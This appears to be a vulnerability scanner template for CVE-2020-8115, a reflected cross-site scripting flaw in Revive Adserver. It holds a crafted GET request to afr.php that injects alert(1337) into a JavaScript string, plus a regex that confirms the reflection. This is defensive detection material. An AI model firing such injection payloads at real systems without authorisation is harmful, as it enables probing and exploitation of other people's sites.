id: cve-2020-8115

info:
  name: Revive Adserver XSS
  author: madrobot & dwisiswant0
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - (?mi)window\.location\.replace\(".*alert\(1337\)